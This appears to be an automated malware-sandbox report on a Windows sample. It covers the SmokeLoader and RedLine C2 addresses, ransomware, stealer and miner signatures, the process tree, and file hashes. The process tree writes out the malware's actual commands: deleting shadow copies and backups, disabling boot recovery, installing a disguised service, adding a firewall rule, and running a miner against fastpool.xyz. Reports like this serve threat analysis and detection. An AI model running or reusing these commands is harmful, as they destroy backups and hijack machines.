Analysis

  • max time kernel
    153s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    21-09-2021 07:16

General

  • Target

    4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766.exe

  • Size

    212KB

  • MD5

    6cc5fa3b215541aaa78c1be9d3fa5054

  • SHA1

    242b01ea25a30bf2bae8cd8c775f9d42bc2b20e1

  • SHA256

    4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766

  • SHA512

    dbc547dbc0436ca6c47c1bacd0bd85cc8945e5e16c3ceeeb73aad80b9822e1e38b7b91852fe56f19a8967a36d2779b4ade632b6d157e42ff180d65e103c0214f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://venerynnet1.top/

http://kevonahira2.top/

http://vegangelist3.top/

http://kingriffaele4.top/

http://arakeishant5.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installEXE

C2

146.70.35.170:30905

Signatures

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • MedusaLocker Payload 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Deletes System State backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 12 IoCs
  • Executes dropped EXE 9 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 42 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 49 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 13 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 12 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766.exe
    "C:\Users\Admin\AppData\Local\Temp\4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1896
    • C:\Users\Admin\AppData\Local\Temp\4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766.exe
      "C:\Users\Admin\AppData\Local\Temp\4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1380
  • C:\Users\Admin\AppData\Local\Temp\59E.exe
    C:\Users\Admin\AppData\Local\Temp\59E.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Users\Admin\AppData\Local\Temp\59E.exe
      C:\Users\Admin\AppData\Local\Temp\59E.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4056
  • C:\Users\Admin\AppData\Local\Temp\131D.exe
    C:\Users\Admin\AppData\Local\Temp\131D.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:2236
  • C:\Users\Admin\AppData\Local\Temp\7003.exe
    C:\Users\Admin\AppData\Local\Temp\7003.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1508
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jkioxzq\
      2⤵
        PID:1428
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zcavpwgq.exe" C:\Windows\SysWOW64\jkioxzq\
        2⤵
          PID:2772
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jkioxzq binPath= "C:\Windows\SysWOW64\jkioxzq\zcavpwgq.exe /d\"C:\Users\Admin\AppData\Local\Temp\7003.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1196
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description jkioxzq "wifi internet conection"
            2⤵
              PID:948
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start jkioxzq
              2⤵
                PID:4012
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1664
              • C:\Users\Admin\AppData\Local\Temp\7FE2.exe
                C:\Users\Admin\AppData\Local\Temp\7FE2.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:3752
              • C:\Windows\SysWOW64\jkioxzq\zcavpwgq.exe
                C:\Windows\SysWOW64\jkioxzq\zcavpwgq.exe /d"C:\Users\Admin\AppData\Local\Temp\7003.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2708
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1056
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                      PID:3788
                • C:\Users\Admin\AppData\Local\Temp\90CB.exe
                  C:\Users\Admin\AppData\Local\Temp\90CB.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2932
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\90CB.exe"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2848
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1984
                • C:\Users\Admin\AppData\Local\Temp\C162.exe
                  C:\Users\Admin\AppData\Local\Temp\C162.exe
                  1⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Modifies extensions of user files
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Enumerates connected drives
                  • Drops file in System32 directory
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:3748
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB
                    2⤵
                    • Interacts with shadow copies
                    PID:596
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:1624
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:1892
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:3644
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2584
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2712
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:700
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:3880
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:256
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:3532
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:948
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2588
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:1656
                  • C:\Windows\SYSTEM32\bcdedit.exe
                    bcdedit.exe /set {default} recoveryenabled No
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3068
                  • C:\Windows\SYSTEM32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2712
                  • C:\Windows\SYSTEM32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:1520
                  • C:\Windows\SYSTEM32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:596
                  • C:\Windows\System32\Wbem\wmic.exe
                    wmic.exe SHADOWCOPY /nointeractive
                    2⤵
                      PID:600
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\C162.exe >> NUL
                      2⤵
                        PID:280
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1652
                    • C:\Users\Admin\AppData\Local\Temp\CFAB.exe
                      C:\Users\Admin\AppData\Local\Temp\CFAB.exe
                      1⤵
                      • Executes dropped EXE
                      PID:1132

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\59E.exe.log

                      MD5

                      41fbed686f5700fc29aaccf83e8ba7fd

                      SHA1

                      5271bc29538f11e42a3b600c8dc727186e912456

                      SHA256

                      df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                      SHA512

                      234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                    • C:\Users\Admin\AppData\Local\Temp\131D.exe

                      MD5

                      c1a6bd70d3ae7b72f30c5c0347ccac79

                      SHA1

                      f5a78d7b54fa8b0a6483fb7a17b91971dd7d2db4

                      SHA256

                      3b3b277003398ada5e15367ec57445b003e1499100c2743b94224ea695431aa5

                      SHA512

                      f59ecdff809b95bc2f83e2db0c38f3e532f1ff9113de13a293a12b756741f60709b3d8f5c3ebd72051558d9b19d20f8200cebc1e5191cdb90d646979b71da410

                    • C:\Users\Admin\AppData\Local\Temp\59E.exe

                      MD5

                      ddb31fb1bc80bcbe1fc7d1e6e6f884be

                      SHA1

                      31023cf0f034a4a12a30091027a567d5dfefecd6

                      SHA256

                      e85d5f6d8e8dda12cf98a66fed8cb80a68b6de681214bc59aed2aa04e9a53c58

                      SHA512

                      944979f50103ca73fa0e52a8f9de4a35072730ecf0b3d4cd8f7161a9a99553155ecad3c8e7df09fe6f180ec325da95f3da527a100810c8e46b462ce67e339c66

                    • C:\Users\Admin\AppData\Local\Temp\59E.exe

                      MD5

                      ddb31fb1bc80bcbe1fc7d1e6e6f884be

                      SHA1

                      31023cf0f034a4a12a30091027a567d5dfefecd6

                      SHA256

                      e85d5f6d8e8dda12cf98a66fed8cb80a68b6de681214bc59aed2aa04e9a53c58

                      SHA512

                      944979f50103ca73fa0e52a8f9de4a35072730ecf0b3d4cd8f7161a9a99553155ecad3c8e7df09fe6f180ec325da95f3da527a100810c8e46b462ce67e339c66

                    • C:\Users\Admin\AppData\Local\Temp\59E.exe

                      MD5

                      ddb31fb1bc80bcbe1fc7d1e6e6f884be

                      SHA1

                      31023cf0f034a4a12a30091027a567d5dfefecd6

                      SHA256

                      e85d5f6d8e8dda12cf98a66fed8cb80a68b6de681214bc59aed2aa04e9a53c58

                      SHA512

                      944979f50103ca73fa0e52a8f9de4a35072730ecf0b3d4cd8f7161a9a99553155ecad3c8e7df09fe6f180ec325da95f3da527a100810c8e46b462ce67e339c66

                    • C:\Users\Admin\AppData\Local\Temp\7003.exe

                      MD5

                      5240ea58144c6a8c136ddc370eb4919d

                      SHA1

                      c8f33fb0bd5fe23d348b7d9763449ec563930c57

                      SHA256

                      423a8f7e356c21ffcaf811d035887962cf02fe4608fbb37e62960e95ef23781a

                      SHA512

                      3914fda955f8eac6a2d0b47b0f9f9aff9c1f368554bf10e87a70b87533461a9c06ec808bae1a94ec31863e7b73cedd2081f07b86e82f53d11b65eeda6b028d31

                    • C:\Users\Admin\AppData\Local\Temp\7003.exe

                      MD5

                      5240ea58144c6a8c136ddc370eb4919d

                      SHA1

                      c8f33fb0bd5fe23d348b7d9763449ec563930c57

                      SHA256

                      423a8f7e356c21ffcaf811d035887962cf02fe4608fbb37e62960e95ef23781a

                      SHA512

                      3914fda955f8eac6a2d0b47b0f9f9aff9c1f368554bf10e87a70b87533461a9c06ec808bae1a94ec31863e7b73cedd2081f07b86e82f53d11b65eeda6b028d31

                    • C:\Users\Admin\AppData\Local\Temp\7FE2.exe

                      MD5

                      3c3f3989151a75b92b3a2f98debe681e

                      SHA1

                      51ec6f8006104a4537a2f4f308f5ca7dadfc2ca6

                      SHA256

                      570ca316f38c64fe877a038a58a8d2ffb2310a7b1e43d05d24c26bfa482a3e43

                      SHA512

                      345e8262d21e0638d8a17ed3c5c4324397887b4b338a2df2443cc58208d4846ef09d1c0c63859f23ea19e0f9a302a0ff55b8c3c198ff861fff7347fac31ab9c6

                    • C:\Users\Admin\AppData\Local\Temp\7FE2.exe

                      MD5

                      3c3f3989151a75b92b3a2f98debe681e

                      SHA1

                      51ec6f8006104a4537a2f4f308f5ca7dadfc2ca6

                      SHA256

                      570ca316f38c64fe877a038a58a8d2ffb2310a7b1e43d05d24c26bfa482a3e43

                      SHA512

                      345e8262d21e0638d8a17ed3c5c4324397887b4b338a2df2443cc58208d4846ef09d1c0c63859f23ea19e0f9a302a0ff55b8c3c198ff861fff7347fac31ab9c6

                    • C:\Users\Admin\AppData\Local\Temp\90CB.exe

                      MD5

                      0be1df1b8b528ea610da0b59e70cc74e

                      SHA1

                      201048738b0975aa0bb8ddedda262a8c9b7ec17d

                      SHA256

                      16b377f7277dee8f7edf8bbec69025c7273b33a3ca24eabaf22aaf41ce06dab9

                      SHA512

                      91385b1813c85ed146b0ae7a4ad05688a07918b89793e55e5a86f412842b2ebbe859ad62bc8f83f964017986933cb323696591cc39aec8c61d22c6b6cae77df6

                    • C:\Users\Admin\AppData\Local\Temp\90CB.exe

                      MD5

                      0be1df1b8b528ea610da0b59e70cc74e

                      SHA1

                      201048738b0975aa0bb8ddedda262a8c9b7ec17d

                      SHA256

                      16b377f7277dee8f7edf8bbec69025c7273b33a3ca24eabaf22aaf41ce06dab9

                      SHA512

                      91385b1813c85ed146b0ae7a4ad05688a07918b89793e55e5a86f412842b2ebbe859ad62bc8f83f964017986933cb323696591cc39aec8c61d22c6b6cae77df6

                    • C:\Users\Admin\AppData\Local\Temp\C162.exe

                      MD5

                      49fb0e5a3415155c24d6839250cd7fed

                      SHA1

                      69fa4c797df21b98740368c268cfd1919bf4a6e0

                      SHA256

                      f2a155473c06ecad973676f1e2a8d228ab4a8adf32a87477c716f31fddf6cbaf

                      SHA512

                      4bcf713b36e0c0bd1e12018cc835a988dbbb2d54556531ebddf97435fd430dab0393fe55e16de5b0c894a49fbea7829f2e6cba5214230f4ee70978a6a87ce397

                    • C:\Users\Admin\AppData\Local\Temp\C162.exe

                      MD5

                      49fb0e5a3415155c24d6839250cd7fed

                      SHA1

                      69fa4c797df21b98740368c268cfd1919bf4a6e0

                      SHA256

                      f2a155473c06ecad973676f1e2a8d228ab4a8adf32a87477c716f31fddf6cbaf

                      SHA512

                      4bcf713b36e0c0bd1e12018cc835a988dbbb2d54556531ebddf97435fd430dab0393fe55e16de5b0c894a49fbea7829f2e6cba5214230f4ee70978a6a87ce397

                    • C:\Users\Admin\AppData\Local\Temp\CFAB.exe

                      MD5

                      f126d6d6eff3fb4c1af3001b72223561

                      SHA1

                      a36a7ef1738ea066986a4bd2899ccc0fdc1f55c9

                      SHA256

                      a4a7ba61378a6c1887311ceb954c37d1988346018435d528552bed4e40928abb

                      SHA512

                      408b4752f2aa49bd5b394ce538768c2d7fe7e4ca089fdd7b4c4f6900f1695bfcea32aa8d41f4b9bab8c25a873e1205976036ce64caf5e047ab823c4bedd082e1

                    • C:\Users\Admin\AppData\Local\Temp\CFAB.exe

                      MD5

                      f126d6d6eff3fb4c1af3001b72223561

                      SHA1

                      a36a7ef1738ea066986a4bd2899ccc0fdc1f55c9

                      SHA256

                      a4a7ba61378a6c1887311ceb954c37d1988346018435d528552bed4e40928abb

                      SHA512

                      408b4752f2aa49bd5b394ce538768c2d7fe7e4ca089fdd7b4c4f6900f1695bfcea32aa8d41f4b9bab8c25a873e1205976036ce64caf5e047ab823c4bedd082e1

                    • C:\Users\Admin\AppData\Local\Temp\zcavpwgq.exe

                      MD5

                      0c8eb152a53297f242bbfd9cb5c165b8

                      SHA1

                      e402d8ba02fd34ebe2b9d324ef47a2909503c442

                      SHA256

                      269dfe47f40736bf7ab974dc56cdebbea5ca2de4a958dabc9612ba916255ef0a

                      SHA512

                      1e02f26121cf98118c48f47d912b42df284757c0cf350ae5a2749f19c33494296d317c4aa4a12139741d877b0107f8e1a12fe606a5aa829d6deb20182e1c78bf

                    • C:\Users\Admin\AppData\Roaming\frfafsh

                      MD5

                      6cc5fa3b215541aaa78c1be9d3fa5054

                      SHA1

                      242b01ea25a30bf2bae8cd8c775f9d42bc2b20e1

                      SHA256

                      4c6dc5b55c14191f873094f6680ea29344fdc376e4f38868ba450fa89ca6c766

                      SHA512

                      dbc547dbc0436ca6c47c1bacd0bd85cc8945e5e16c3ceeeb73aad80b9822e1e38b7b91852fe56f19a8967a36d2779b4ade632b6d157e42ff180d65e103c0214f

                    • C:\Windows\SysWOW64\config\systemprofile\

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • C:\Windows\SysWOW64\jkioxzq\zcavpwgq.exe

                      MD5

                      0c8eb152a53297f242bbfd9cb5c165b8

                      SHA1

                      e402d8ba02fd34ebe2b9d324ef47a2909503c442

                      SHA256

                      269dfe47f40736bf7ab974dc56cdebbea5ca2de4a958dabc9612ba916255ef0a

                      SHA512

                      1e02f26121cf98118c48f47d912b42df284757c0cf350ae5a2749f19c33494296d317c4aa4a12139741d877b0107f8e1a12fe606a5aa829d6deb20182e1c78bf

                    • \Users\Admin\AppData\LocalLow\sqlite3.dll

                      MD5

                      f964811b68f9f1487c2b41e1aef576ce

                      SHA1

                      b423959793f14b1416bc3b7051bed58a1034025f

                      SHA256

                      83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                      SHA512

                      565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                    • \Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll

                      MD5

                      60acd24430204ad2dc7f148b8cfe9bdc

                      SHA1

                      989f377b9117d7cb21cbe92a4117f88f9c7693d9

                      SHA256

                      9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                      SHA512

                      626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                    • \Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll

                      MD5

                      eae9273f8cdcf9321c6c37c244773139

                      SHA1

                      8378e2a2f3635574c106eea8419b5eb00b8489b0

                      SHA256

                      a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

                      SHA512

                      06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

                    • \Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll

                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll

                      MD5

                      4e8df049f3459fa94ab6ad387f3561ac

                      SHA1

                      06ed392bc29ad9d5fc05ee254c2625fd65925114

                      SHA256

                      25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

                      SHA512

                      3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

                    • memory/256-230-0x0000000000000000-mapping.dmp

                    • memory/280-253-0x0000000000000000-mapping.dmp

                    • memory/596-222-0x0000000000000000-mapping.dmp

                    • memory/596-238-0x0000000000000000-mapping.dmp

                    • memory/600-239-0x0000000000000000-mapping.dmp

                    • memory/700-228-0x0000000000000000-mapping.dmp

                    • memory/948-189-0x0000000000000000-mapping.dmp

                    • memory/948-232-0x0000000000000000-mapping.dmp

                    • memory/1056-207-0x00000000001B0000-0x00000000001C5000-memory.dmp

                      Filesize

                      84KB

                    • memory/1056-208-0x00000000001B9A6B-mapping.dmp

                    • memory/1132-249-0x0000000002250000-0x00000000022E0000-memory.dmp

                      Filesize

                      576KB

                    • memory/1132-250-0x0000000000400000-0x0000000000503000-memory.dmp

                      Filesize

                      1.0MB

                    • memory/1132-240-0x0000000000000000-mapping.dmp

                    • memory/1196-188-0x0000000000000000-mapping.dmp

                    • memory/1380-116-0x0000000000402DCE-mapping.dmp

                    • memory/1380-115-0x0000000000400000-0x0000000000408000-memory.dmp

                      Filesize

                      32KB

                    • memory/1428-180-0x0000000000000000-mapping.dmp

                    • memory/1508-167-0x0000000000000000-mapping.dmp

                    • memory/1508-182-0x00000000005A0000-0x00000000005B3000-memory.dmp

                      Filesize

                      76KB

                    • memory/1508-183-0x0000000000400000-0x00000000004C0000-memory.dmp

                      Filesize

                      768KB

                    • memory/1520-237-0x0000000000000000-mapping.dmp

                    • memory/1624-223-0x0000000000000000-mapping.dmp

                    • memory/1656-234-0x0000000000000000-mapping.dmp

                    • memory/1664-192-0x0000000000000000-mapping.dmp

                    • memory/1892-224-0x0000000000000000-mapping.dmp

                    • memory/1896-117-0x00000000004C0000-0x000000000056E000-memory.dmp

                      Filesize

                      696KB

                    • memory/1984-221-0x0000000000000000-mapping.dmp

                    • memory/2236-151-0x0000000006A20000-0x0000000006A21000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-131-0x00000000009F0000-0x00000000009F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-128-0x0000000000000000-mapping.dmp

                    • memory/2236-133-0x0000000005910000-0x0000000005911000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-139-0x0000000077E30000-0x0000000077FBE000-memory.dmp

                      Filesize

                      1.6MB

                    • memory/2236-137-0x0000000005220000-0x0000000005221000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-141-0x0000000005410000-0x0000000005411000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-145-0x0000000005280000-0x0000000005281000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-149-0x00000000052F0000-0x00000000052F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-154-0x0000000007120000-0x0000000007121000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-160-0x0000000006E90000-0x0000000006E91000-memory.dmp

                      Filesize

                      4KB

                    • memory/2236-165-0x0000000008870000-0x0000000008871000-memory.dmp

                      Filesize

                      4KB

                    • memory/2584-226-0x0000000000000000-mapping.dmp

                    • memory/2588-233-0x0000000000000000-mapping.dmp

                    • memory/2708-206-0x0000000000400000-0x00000000004C0000-memory.dmp

                      Filesize

                      768KB

                    • memory/2712-227-0x0000000000000000-mapping.dmp

                    • memory/2712-236-0x0000000000000000-mapping.dmp

                    • memory/2772-186-0x0000000000000000-mapping.dmp

                    • memory/2788-122-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2788-126-0x0000000005D60000-0x0000000005D61000-memory.dmp

                      Filesize

                      4KB

                    • memory/2788-127-0x0000000005850000-0x0000000005851000-memory.dmp

                      Filesize

                      4KB

                    • memory/2788-125-0x00000000056A0000-0x00000000056A1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2788-124-0x00000000056D0000-0x00000000056D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2788-119-0x0000000000000000-mapping.dmp

                    • memory/2848-219-0x0000000000000000-mapping.dmp

                    • memory/2872-118-0x0000000000430000-0x0000000000445000-memory.dmp

                      Filesize

                      84KB

                    • memory/2932-196-0x0000000006550000-0x000000000A62F000-memory.dmp

                      Filesize

                      64.9MB

                    • memory/2932-197-0x0000000000400000-0x0000000004605000-memory.dmp

                      Filesize

                      66.0MB

                    • memory/2932-193-0x0000000000000000-mapping.dmp

                    • memory/3068-235-0x0000000000000000-mapping.dmp

